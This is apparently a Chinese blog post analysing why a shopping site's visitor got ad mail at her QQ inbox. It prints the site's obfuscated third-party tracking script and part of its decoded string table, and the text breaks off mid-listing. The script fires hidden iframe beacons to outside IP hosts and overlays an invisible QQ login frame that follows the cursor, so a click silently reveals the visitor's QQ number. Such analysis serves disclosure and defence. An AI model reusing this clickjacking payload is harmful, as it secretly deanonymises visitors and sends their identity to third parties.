0.起因
刚上QQ就看到小八同学给我发来消息,说她刚打开一个网站还没看,停了十几秒的样子,就收到了这个网站发来的广告邮件,并且是准确无误地发到了她的QQ邮箱里,而她并没有用QQ登录这个网站,所以很疑惑怎么被黑的。
听到这个事儿的第一反应是,应该是广告浮窗吧——因为之前遇到过进网站然后右下角搞个假模假样的浮窗说你收到了新邮件。可是仔细看了看觉得好像是真的——
那个QQ号和名字信息确实都是正确的。既然如此,那确实有必要看一下了。
1.简单了解
祭出Fiddler抓包。清除所有浏览器缓存后,浏览目标网页(http://www.zxdl369.cn/onlineshop/fojiaoyongpin/tongzhutai/)。等待所有网页加载完成后,查看一下Fiddler中记录的请求,确实有比较奇怪的请求,这些请求的主机或网址明显与所打开的网址完全不符,其中还混入了一些不和谐的搜狗味道。
(以上已过滤掉明显无异常且与本文无关的请求)
仔细审阅这些请求后,赫然发现确实有个请求竟然返回了我的QQ号到Cookies里,而这个请求的主机很明显不是企鹅的东西。
看来必须追查了。
2.追查
既然要追查,那么就要找到源头。根据大致的判断,请求肯定出现在那些奇奇怪怪的第三方请求里(因为从这个网站做的质量来看……我觉得乃们木有这水平)。
因此找到之前那张图里第一个标注红圈儿的#13号请求。这个请求的来源是哪里呢?在Chrome中简单追查了一下,找到了来源。
……直接就是网页带进来的吗?好吧。
我们看看这个请求的内容是什么。
看起来是一段经过混淆处理的JS。
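// First-stage loader returned by the third-party script request (#13 in the capture).
// Restored from the blog rendering: the ″ after 5867 was a smart-quote artifact of a
// plain " (the formatted listing further down shows the same value as a string).
var puid="5867";
var pap="http://182.92.239.23/g.php?surl=";
// Page context that gets reported: referrer, current URL and title, URL-encoded.
var pr = encodeURIComponent(document.referrer);
var pu = encodeURIComponent(document.location.href);
var pt = encodeURIComponent(document.title);
var phead = document.getElementsByTagName('HEAD').item(0);
// cslist is the report payload; purl wraps a second beacon URL (42.120.11.238:8888, action=p)
// as the surl= parameter of g.php on 182.92.239.23.
var cslist="uid="+puid+"&r=" + pr + "&u=" + pu + "&t=" + pt;
var purl = encodeURIComponent("http://42.120.11.238:8888/?action=p&"+cslist+"&f=jfif&p=");
// Cimg builds a hidden <img> beacon but never attaches it to the DOM and is never called here.
function Cimg(src) {var a = document.createElement("img");a.src = src;a.style = "display:none";};
// Cifr appends a zero-size, hidden iframe pointing at src to <head>.
function Cifr(src) {var ifr = document.createElement("iframe");ifr.src = src;ifr.width =ifr.height= ifr.frameBorder=0;ifr.scrolling = "no";ifr.allowTransparency = "true";ifr.style.display='none';phead.appendChild(ifr);};
// The beacon fires as soon as the script is evaluated.
Cifr(pap + purl);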
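// Parameters consumed by the packed script that follows. Restored from the blog rendering:
// each ″ was a plain " (the formatted listing further down shows the same values).
var i_php = "http://42.120.11.238:8888/";   // collection server that the later beacons report to
var i_uid = "5867";                         // same site/customer id as puid above
var i_h="0";                                // selects which qqchat5u variant is scheduled; '0' schedules none
var i_qq="0";                               // QQ number used by qqchat5u for the tencent://message link
var i_d="www.zxdl369.cn";                   // the tracker only activates when document.domain contains this
var i_yc= 2000;                             // delay in ms before qqchat5u would run
var i_fkid="1416369920";                    // id sent along with the sx.php and wdl.php requests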
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c–)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C j=["\\m\\l\\k\\v","\\4l\\1t\\1l\\2d","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\w\\1n\\O\\1e\\q\\E\\2z\\q\\v\\k","\\p\\k\\G\\k\\p\\p\\k\\p","\\B\\p\\k\\G","\\s\\n\\u\\q\\l\\m\\n\\o","\\l\\m\\l\\s\\k","\\m\\G\\p\\q\\v\\k","\\u\\p\\k\\q\\l\\k\\1t\\s\\k\\v\\k\\o\\l","\\w\\p\\u","","\\m\\y","\\u\\w\\w\\1e\\k\\R\\l","\\w\\l\\O\\s\\k","\\1b\\m\\y\\l\\B\\N\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\F\\r\\R\\L\\y\\m\\w\\r\\s\\q\\O\\N\\o\\n\\o\\k\\L","\\w\\u\\p\\n\\s\\s\\m\\o\\E","\\o\\n","\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p","\\F","\\w\\k\\l\\1l\\l\\l\\p\\m\\H\\x\\l\\k","\\q\\r\\r\\k\\o\\y\\1k\\B\\m\\s\\y","\\w\\u\\p\\m\\r\\l","\\l\\O\\r\\k","\\l\\k\\R\\l\\M\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l","\\u\\B\\q\\p\\w\\k\\l","\\x\\l\\G\\1a\\1Z","\\1n\\1Y\\2d\\1X","\\1f\\2e\\2h\\P\\1c","\\t\\1f\\4j\\2e\\L\\4e\\3U\\1c\\1f\\L\\2h\\2M\\1c","\\v\\q\\l\\u\\B","\\u\\n\\n\\W\\m\\k","\\E\\k\\l\\1e\\m\\v\\k","\\w\\k\\l\\1e\\m\\v\\k","\\t","\\L\\k\\R\\r\\m\\p\\k\\w\\t","\\l\\n\\3S\\2c\\1e\\1j\\l\\p\\m\\o\\E","\\1g\\q\\u\\l\\m\\n\\o\\t\\w\\q\\X\\k\\2f\\2f\\z\\x\\m\\y\\t","\\z\\I\\1p\\t","\\z\\l\\m\\v\\k\\t","\\z\\p\\k\\G\\k\\p\\p\\k\\p\\t","\\z\\x\\p\\s\\t","\\z\\l\\m\\l\\s\\k\\t","\\z\\p\\t","\\w\\v\\k\\X\\o\\Q\\y\\x","\\M\\w\\R\\K\\r\\B\\r\\1g\\x\\m\\y\\t","\\z\\p\\k\\G\\t","\\z\\G\\x\\p\\s\\t","\\z\\G\\W\\m\\y\\t","\\z\\l\\v\\t","\\M\\v\\M\\1b\\y\\s\\K\\r\\B\\r\\1g\\u\\t","\\z\\p\\t\\V\\z\\l\\m\\v\\k\\t","\\1X","\\x\\w\\k\\p\\1l\\E\\k\\o\\l","\\m\\G\\r\\l\\x\\Q\\x","\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\3N\\m\\G\\p\\q\\v\\k\\P\\w\\l\\O\\s\\k\\t\\T\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\1b\\m\\y\\l\\B\\N\\Q\\1Z\\F\\r\\R\\L\\B\\k\\m\\E\\B\\l\\N\\1I\\1H\\1H\\r\\R\\L\\P\\v\\q\\p\\E\\m
\\o\\N\\1a\\V\\Q\\F\\r\\R\\P\\F\\P\\F\\P\\1a\\1I\\1G\\F\\r\\R\\L\\G\\m\\s\\l\\k\\p\\N\\q\\s\\r\\B\\q\\1f\\n\\r\\q\\u\\m\\l\\O\\t\\F\\F\\1c\\L\\1a\\v\\n\\1p\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\F\\K\\F\\L\\1a\\W\\B\\l\\v\\s\\1a\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\n\\r\\q\\u\\m\\l\\O\\N\\P\\F\\K\\F\\L\\T\\P\\w\\u\\p\\n\\s\\s\\m\\o\\E\\t\\T\\o\\n\\T\\P\\o\\q\\v\\k\\t\\T\\v\\H\\Q\\x\\T\\P\\m\\y\\t\\T\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o\\T\\P\\w\\p\\u\\t\\T\\B\\l\\l\\r\\N\\M\\M\\x\\m\\K\\r\\l\\s\\n\\E\\m\\o\\Y\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\1a\\H\\m\\o\\M\\s\\n\\E\\m\\o\\1g\\s\\m\\o\\W\\U\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\l\\q\\p\\E\\k\\l\\t\\H\\s\\q\\o\\W\\z\\q\\r\\r\\m\\y\\t\\1H\\F\\F\\F\\Y\\F\\V\\z\\y\\q\\m\\y\\t\\Y\\Y\\F\\z\\B\\m\\y\\k\\U\\x\\m\\o\\U\\l\\m\\r\\t\\V\\z\\w\\l\\O\\s\\k\\t\\V\\V\\z\\B\\m\\y\\k\\U\\u\\s\\n\\w\\k\\U\\m\\u\\n\\o\\t\\V\\z\\l\\q\\p\\E\\k\\l\\t\\w\\k\\s\\G\\z\\I\\l\\q\\p\\E\\k\\l\\t\\F\\z\\B\\m\\y\\k\\U\\l\\m\\l\\s\\k\\U\\H\\q\\p\\t\\V\\z\\w\\U\\x\\p\\s\\t\\B\\l\\l\\r\\1w\\1I\\1l\\1w\\Y\\1x\\1w\\Y\\1x\\q\\r\\r\\K\\y\\q\\l\\q\\K\\I\\I\\K\\u\\n\\v\\1w\\Y\\1x\\u\\q\\l\\k\\1w\\Y\\1x\\r\\n\\r\\1y\\n\\E\\m\\o\\T\\P\\G\\p\\q\\v\\k\\H\\n\\p\\y\\k\\p\\t\\T\\F\\T\\P\\n\\o\\s\\n\\q\\y\\t\\T\\w\\k\\l\\1e\\m\\v\\k\\n\\x\\l\\1f\\l\\n\\r\\K\\v\\H\\Q\\x\\U\\m\\G\\v\\n\\X\\k\\3L\\F\\1c\\L\\T\\3I","\\2N\\q\\X\\q\\w\\u\\p\\m\\r\\l\\N\\r\\q\\p\\k\\o\\l\\K\\v\\H\\Q\\x\\r\\l\\s\\n\\E\\m\\o","\\r\\n\\w\\m\\l\\m\\n\\o\\N\\q\\H\\w\\n\\s\\x\\l\\k\\L\\P\\1p\\1a\\m\\o\\y\\k\\R\\N\\P\\Y\\V\\1G\\2o\\1G\\1Z\\1I\\1H\\1G\\2o\\L\\1b\\m\\y\\l\\B\\N\\Q\\F\\r\\R\\L\\P\\B\\k\\m\\E\\B\\l\\N\\Q\\F\\r\\R\\L\\P","\\n\\o\\k\\p\\p\\n\\p","\\p\\k\\l\\x\\p\\o\\P\\l\\p\\x\\k\\L","\\G\\m\\p\\w\\l\\1k\\B\\m\\s\\y","\\H\\n\\y\\O","\\m\\o\\w\\k\\p\\l\\1n\\k\\G\\n\\p\\k","\\u\\x\\p\\p\\k\\o\\l\\1j\\l\\O\\s\\k","\\E\\k\\l\\1k\\n\\v\\r\\x\\l\\k\\y\\1j\\l\\O\\s\\k","\\1a\\2M\\V","\\p\\k\\r\\s\\q\\u\\k","\\l\\n\\1y\\n\\1b\\k\\p\\1k\\q\\w\\k","\\y\\k\\G\\q\\x\\s\\l\\3E\\m\\k\\1b","\\v\\H\\Q\\x\\U\
\m\\G\\v\\n\\X\\k","\\E\\k\\l\\1t\\s\\k\\v\\k\\o\\l\\1n\\O\\3D\\y","\\n\\o\\v\\n\\x\\w\\k\\v\\n\\X\\k","\\G\\n\\u\\x\\w","\\k\\X\\k\\o\\l","\\u\\s\\m\\k\\o\\l\\3x","\\u\\s\\m\\k\\o\\l\\1X","\\w\\u\\p\\n\\s\\s\\1e\\n\\r","\\y\\n\\u\\x\\v\\k\\o\\l\\1t\\s\\k\\v\\k\\o\\l","\\n\\G\\G\\w\\k\\l\\2u\\m\\y\\l\\B","\\w\\u\\p\\n\\s\\s\\1y\\k\\G\\l","\\r\\n\\w\\m\\l\\m\\n\\o","\\u\\s\\m\\k\\o\\l\\2u\\m\\y\\l\\B","\\p\\k\\s\\q\\l\\m\\X\\k","\\l\\n\\r","\\r\\R","\\s\\k\\G\\l","\\n\\o\\v\\n\\x\\w\\k\\n\\X\\k\\p","\\n\\o\\v\\n\\x\\w\\k\\n\\x\\l","\\n\\o\\H\\s\\x\\p","\\y\\m\\w\\r\\s\\q\\O","\\o\\n\\o\\k","\\k\\s\\k\\v\\k\\o\\l\\1x\\p\\n\\v\\2v\\n\\m\\o\\l","\\u\\s\\m\\u\\W","\\V","\\l\\k\\o\\u\\k\\o\\l\\N\\M\\M\\v\\k\\w\\w\\q\\E\\k\\M\\1g\\x\\m\\o\\t","\\z\\1j\\m\\l\\k\\t","\\z\\2c\\k\\o\\x\\t\\O\\k\\w","\\I\\I\\u\\B\\q\\l\\Q\\x\\V","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\s\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\u\\n\\o\\X\\K\\r\\B\\r\\1g\\o\\x\\v\\t","\\z\\u\\H\\t\\3w\\1j\\1Y\\2z\\2v\\U\\1k\\1l\\1y\\1y\\1n\\1l\\1k\\3v\\U\\Q\\x","\\H\\m\\1p\\I\\I\\W\\k\\O","\\W\\G\\x\\m\\o","\\y\\q\\l\\q","\\B\\l\\l\\r\\N\\M\\M\\1b\\r\\y\\K\\H\\K\\I\\I\\K\\u\\n\\v\\M\\u\\E\\m\\M\\E\\k\\l\\U\\w\\m\\E\\o\\K\\r\\B\\r\\1g\\o\\q\\t","\\z\\W\\G\\x\\m\\o\\t","\\z\\q\\l\\O\\t\\F\\z\\q\\t\\F\\z\\w\\m\\y\\t\\z\\x\\m\\y\\t\\z\\x\\p\\s\\t","\\z\\y\\v\\t\\z\\u\\s\\W\\1j\\p\\u\\t\\z\\k\\R\\l\\t\\z\\u\\H\\t\\H\\m\\1p\\I\\I\\W\\k\\O\\Q\\x","\\z\\q\\v\\r\\L","\\z","\\w\\m\\E\\o","\\M","\\I\\I\\u\\B\\q\\l\\Q\\x\\Y","\\m\\o\\y\\k\\R\\1Y\\G","\\y\\n\\v\\q\\m\\o","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\V\\1c","\\Y","\\I\\I\\u\\B\\q\\l\\Q\\x\\1f\\1c"];C 1Q=D[j[2]](j[1])[j[0]](0);C 1D=0;C 2K=0;C 1r=1L;C 1R=1M(D[j[3]]);C 1E=1M(D[j[5]][j[4]]);C 1F=1M(D[j[6]]);J 2m(b,c){C a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);1Q[j[20]](a)}J 1s(b,c){C a=D[j[8]](j[21]);a[j[22]]=j[23];S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[24]]=j[25];a[j[9]]=b;1Q[j[20]](a)}J 1N(b,c){C 
a=D[j[8]](j[7]);a[j[9]]=b;S(c!=j[10]&&c!=1d){a[j[11]]=c};a[j[13]][j[12]]=j[14];a[j[15]]=j[16];a[j[19]](j[17],j[18],0);D[j[2]](j[26])[j[0]](0)[j[20]](a)}J 2j(a){C b,2k=1z 3s(j[27]+a+j[28]);S(b=D[j[30]][j[29]](2k)){1o 3o(b[2])}1J{1o 1d}}J 2s(a,b){C c=1z 1K();c[j[32]](c[j[31]]()+2*24*1T*1T*2x);D[j[30]]=a+j[33]+3j(b)+j[34]+c[j[35]]()}J 3i(){C a=1W+j[36]+2E+j[37]+3g+j[38]+3a+j[39]+1R+j[40]+1E+j[41]+1F+j[42]+(1z 1K())[j[31]]();1s(a,j[43])}J 2a(){C a=1W+j[44]+2E+j[45]+1R+j[46]+1E+j[41]+1F+j[47]+2P+j[48]+(1z 1K())[j[31]]();2m(a)}J 2O(){C a=1W+j[49]+2P+j[2Q]+(1z 1K)[j[31]]();1s(a);1v(2L,2R)}J 2L(){S(2S==j[2T]){S(!2U[j[2V]][j[29]](/(2W|2X|2Y|2Z)/i)){S(2j(j[2I])==1d){2H()}}}}J 2H(){1m[j[1u]]=j[3b];C a=D[j[8]](j[7]);a[j[9]]=j[3c];a[j[11]]=j[1u];a[j[13]][j[12]]=j[3d];a[j[15]]=j[16];a[j[3e]]=j[3f];a[j[19]](j[17],j[18],0);C b=D[j[1h]][j[1T]];D[j[1h]][j[3h]](a,b)}J 2F(a,b){S(a[j[2D]]){1o a[j[2D]][b]}1J{S(1m[j[2B]]){1V=b[j[1U]](/([A-Z])/g,j[3k]);1V=b[j[3l]]();1o D[j[3m]][j[2B]](a,1d)[1V]}};1o 1d}1m[j[3n]]=J(){C h=D[j[1S]](j[1u]);2q(h,2n);D[j[3p]]=J(a){1r=1L;1m[j[3q]]();C b=D[j[1S]](j[1u]);C a=a||1m[j[3r]];1D=a[j[1i]];1D=a[j[1P]];C c=D[j[1h]][j[2i]]+D[j[1A]][j[2i]];C d=D[j[1A]][j[1q]]-a[j[1i]];C e=D[j[1h]][j[2g]]+D[j[1A]][j[2g]];C f=0;C g=2F(D[j[1h]],j[3t]);S(D[j[1A]][j[1C]]>D[j[1h]][j[1C]]&&g==j[3u]){f=(D[j[1A]][j[1C]]-D[j[1h]][j[1C]])/2;f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])-f)+j[1B]}1J{f=f+e;b[j[13]][j[2y]]=(c+a[j[1P]]-25)+j[1B];b[j[13]][j[2t]]=((d<b[j[1q]]?a[j[1i]]-b[j[1q]]:a[j[1i]])+f)+j[1B]}}};J 2q(a,b){a[j[3y]]=J(){1r=3z};a[j[3A]]=J(){1r=1L};1m[j[3B]]=J(){S(1r){b()}}}J 2n(){C b=D[j[1S]](j[1u]);1v(J(){3C{b[j[13]][j[2r]]=j[2p];C a=D[j[3F]](1D,2K);a[j[3G]]()}3H(e){b[j[13]][j[2r]]=j[2p]};2a();2s(j[2I],j[2l])},2x)}J 3J(i){S(i==1){C a=j[3K]+1O+j[3M]+2G+j[3O];1N(a,j[3P])}1J{1s(j[3Q]+1O+j[3R],j[2b])}}J 3T(a){C b=a[j[2J]][j[3V]];1s(j[3W]+1O+j[3X]+b+j[3Y]+1E+j[41]+1F+j[3Z],j[2b])}J 4a(a){C 
b=a[j[2J]][j[4b]][j[1U]](j[4c],j[4d]);b=b[j[1U]](j[2C],j[2C]);1N(b,j[4f])}S(D[j[4g]][j[4h]](2G)>=0){2a();1v(2O,4i);S(2A==j[2l]){1v(j[4k],2w)};S(2A==j[4m]){1v(j[4n],2w)}};',62,272,'|||||||||||||||||||_0xc112|x65|x74|x69|x6F|x6E|x72|x61|x70|x6C|x3D|x63|x6D|x73|x75|x64|x26||x68|var|document|x67|x30|x66|x62|x71|function|x2E|x3B|x2F|x3A|x79|x20|x35|x78|if|x22|x5F|x31|x6B|x76|x32||||||||||||x2D|x77|x29|null|x54|x28|x3F|61|74|x53|x43|x41|window|x42|return|x7A|78|mb5u_iframe_hover|Creatjs5u|x45|54|setTimeout|x25|x46|x4C|new|77|84|81|mb5ux|i_url|i_title|x34|x36|x33|else|Date|false|encodeURIComponent|Creatif5ubody|i_qq|75|mb5u_oHead|i_referrer|70|60|66|propprop|i_php|x59|x4F|x38|||||||||||Umb5u|100|x4D|x44|x5E|x51|79|x7C|76|Gc5u|reg|93|Creatif5u|mb5uiframeclickcallback|x37|90|mb5u_iframeClick|89|Sc5u|85|x57|x50|i_yc|1000|83|x4E|i_h|64|110|63|i_uid|mb5u_GetCurrentStyle|i_d|ptU5u|53|102|mb5uy|ck5u|x24|x6A|mb5u_noLogin|i_fkid|50|500|wdl|51|navigator|52|iPhone|iPod|Android|ios|||||||||||i_time|55|56|57|58|59|i_qz|62|Q5u|escape|65|67|68|69|unescape|71|72|73|RegExp|80|82|x4B|x4A|x58|86|true|87|88|try|x49|x56|91|92|catch|x3E|qqchat5u|94|x2C|95|x3C|96|97|98|99|x47|JSONP_CALLBACK_5u|x2A|101|103|104|105|106|||||||||||bizqqkey5u|109|107|108|x5D|111|113|112|1500|x5B|114|x48|115|116′.split('|'),0,{}));
别看这段JS不长,其实还挺厉害的嘞……经过了二次混淆:外层是 eval(function(p,a,c,k,e,r){...}) 这种字典压缩,内层则把所有字符串改写成 \x 十六进制转义、塞进 _0xc112 数组后再按下标引用。我们先进行第一次反混淆,把外层解开。
var _0xc112=["\x69\x74\x65\x6D","\x48\x45\x41\x44″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,"\x72\x65\x66\x65\x72\x72\x65\x72″,"\x68\x72\x65\x66″,"\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x69\x74\x6C\x65″,"\x69\x66\x72\x61\x6D\x65″,"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,"\x73\x72\x63″,"","\x69\x64″,"\x63\x73\x73\x54\x65\x78\x74″,"\x73\x74\x79\x6C\x65″,"\x77\x69\x64\x74\x68\x3A\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x30\x70\x78\x3B\x64\x69\x73\x70\x6C\x61\x79\x3A\x6E\x6F\x6E\x65\x3B","\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67″,"\x6E\x6F","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72″,"\x30″,"\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65″,"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,"\x73\x63\x72\x69\x70\x74″,"\x74\x79\x70\x65″,"\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,"\x63\x68\x61\x72\x73\x65\x74″,"\x75\x74\x66\x2D\x38″,"\x42\x4F\x44\x59″,"\x28\x5E\x7C\x20\x29″,"\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29″,"\x6D\x61\x74\x63\x68″,"\x63\x6F\x6F\x6B\x69\x65″,"\x67\x65\x74\x54\x69\x6D\x65″,"\x73\x65\x74\x54\x69\x6D\x65″,"\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67″,"\x3F\x61\x63\x74\x69\x6F\x6E\x3D\x73\x61\x76\x65\x51\x51\x26\x75\x69\x64\x3D","\x26\x71\x7A\x3D","\x26\x74\x69\x6D\x65\x3D","\x26\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x26\x75\x72\x6C\x3D","\x26\x74\x69\x74\x6C\x65\x3D","\x26\x72\x3D","\x73\x6D\x65\x76\x6E\x35\x64\x75″,"\x2F\x73\x78\x2E\x70\x68\x70\x3F\x75\x69\x64\x3D","\x26\x72\x65\x66\x3D","\x26\x66\x75\x72\x6C\x3D","\x26\x66\x6B\x69\x64\x3D","\x26\x74\x6D\x3D","\x2F\x6D\x2F\x77\x64\x6C\x2E\x70\x68\x70\x3F\x63\x3D","\x26\x72\x3D\x31\x26\x74\x69\x6D\x65\x3D","\x59″,"\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,"\x69\x66\x70\x74\x75\x35\x75″,"\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x77\x69\
x64\x74\x68\x3A\x35\x38\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x36\x36\x70\x78\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x2D\x31\x35\x30\x70\x78\x20\x30\x20\x30\x20\x2D\x33\x34\x30\x70\x78\x3B\x66\x69\x6C\x74\x65\x72\x3A\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x69\x74\x79\x3D\x30\x30\x29\x3B\x2D\x6D\x6F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x30\x2E\x30\x3B\x2D\x6B\x68\x74\x6D\x6C\x2D\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x6F\x70\x61\x63\x69\x74\x79\x3A\x20\x30\x2E\x30\x3B\x22\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x62\x35\x75\x22\x20\x69\x64\x3D\x22\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x75\x69\x2E\x70\x74\x6C\x6F\x67\x69\x6E\x32\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2D\x62\x69\x6E\x2F\x6C\x6F\x67\x69\x6E\x3F\x6C\x69\x6E\x6B\x5F\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x74\x61\x72\x67\x65\x74\x3D\x62\x6C\x61\x6E\x6B\x26\x61\x70\x70\x69\x64\x3D\x36\x30\x30\x30\x32\x30\x31\x26\x64\x61\x69\x64\x3D\x32\x32\x30\x26\x68\x69\x64\x65\x5F\x75\x69\x6E\x5F\x74\x69\x70\x3D\x31\x26\x73\x74\x79\x6C\x65\x3D\x31\x31\x26\x68\x69\x64\x65\x5F\x63\x6C\x6F\x73\x65\x5F\x69\x63\x6F\x6E\x3D\x31\x26\x74\x61\x72\x67\x65\x74\x3D\x73\x65\x6C\x66\x26\x71\x74\x61\x72\x67\x65\x74\x3D\x30\x26\x68\x69\x64\x65\x5F\x74\x69\x74\x6C\x65\x5F\x62\x61\x72\x3D\x31\x26\x73\x5F\x75\x72\x6C\x3D\x68\x74\x74\x70\x25\x33\x41\x25\x32\x46\x25\x32\x46\x61\x70\x70\x2E\x64\x61\x74\x61\x2E\x71\x71\x2E\x63\x6F\x6D\x25\x32\x46\x63\x61\x74\x65\x25\x32\x46\x70\x6F\x70\x4C\x6F\x67\x69\x6E\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x6F\x6E\x6C\x6F\x61\x64\x3D\x22\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x28\x74\x6F\x70\x2E\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65\x2C\x30\x29\x3B\x22\x3E","\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x70\x61\x72\x65\x6E\x74\x2E\x6D\x62\x35\x75\x70\x74\x6C\x6F\x67\x69\x6E","\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x6
1\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x32\x31\x34\x37\x34\x38\x33\x36\x34\x37\x3B\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x35\x30\x70\x78\x3B\x20″,"\x6F\x6E\x65\x72\x72\x6F\x72″,"\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B","\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64″,"\x62\x6F\x64\x79″,"\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,"\x63\x75\x72\x72\x65\x6E\x74\x53\x74\x79\x6C\x65″,"\x67\x65\x74\x43\x6F\x6D\x70\x75\x74\x65\x64\x53\x74\x79\x6C\x65″,"\x2D\x24\x31″,"\x72\x65\x70\x6C\x61\x63\x65″,"\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65″,"\x64\x65\x66\x61\x75\x6C\x74\x56\x69\x65\x77″,"\x6D\x62\x35\x75\x5F\x69\x66\x6D\x6F\x76\x65″,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65″,"\x66\x6F\x63\x75\x73″,"\x65\x76\x65\x6E\x74″,"\x63\x6C\x69\x65\x6E\x74\x58″,"\x63\x6C\x69\x65\x6E\x74\x59″,"\x73\x63\x72\x6F\x6C\x6C\x54\x6F\x70″,"\x64\x6F\x63\x75\x6D\x65\x6E\x74\x45\x6C\x65\x6D\x65\x6E\x74″,"\x6F\x66\x66\x73\x65\x74\x57\x69\x64\x74\x68″,"\x73\x63\x72\x6F\x6C\x6C\x4C\x65\x66\x74″,"\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x63\x6C\x69\x65\x6E\x74\x57\x69\x64\x74\x68″,"\x72\x65\x6C\x61\x74\x69\x76\x65″,"\x74\x6F\x70″,"\x70\x78″,"\x6C\x65\x66\x74″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x76\x65\x72″,"\x6F\x6E\x6D\x6F\x75\x73\x65\x6F\x75\x74″,"\x6F\x6E\x62\x6C\x75\x72″,"\x64\x69\x73\x70\x6C\x61\x79″,"\x6E\x6F\x6E\x65″,"\x65\x6C\x65\x6D\x65\x6E\x74\x46\x72\x6F\x6D\x50\x6F\x69\x6E\x74″,"\x63\x6C\x69\x63\x6B","\x31″,"\x74\x65\x6E\x63\x65\x6E\x74\x3A\x2F\x2F\x6D\x65\x73\x73\x61\x67\x65\x2F\x3F\x75\x69\x6E\x3D","\x26\x53\x69\x74\x65\x3D","\x26\x4D\x65\x6E\x75\x3D\x79\x65\x73″,"\x71\x71\x63\x68\x61\x74\x35\x75\x31″,"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x70\x6C\x2E\x62\x2E\x71\x71\x2E\x63\x6F\x6D\x2F\x63\x67\x69\x2F\x63\x6F\x6E\x76\x2E\x70\x68\x70\x3F\x6E\x75\x6D\x3D","\x26\x63\x62\x3D\x4A\x53\x4F\x4E\x50\x5F\x43\x41\x4C\x4C\x42\x41\x43\x4B\x5F\x35\x75″,"\x62\x69\x
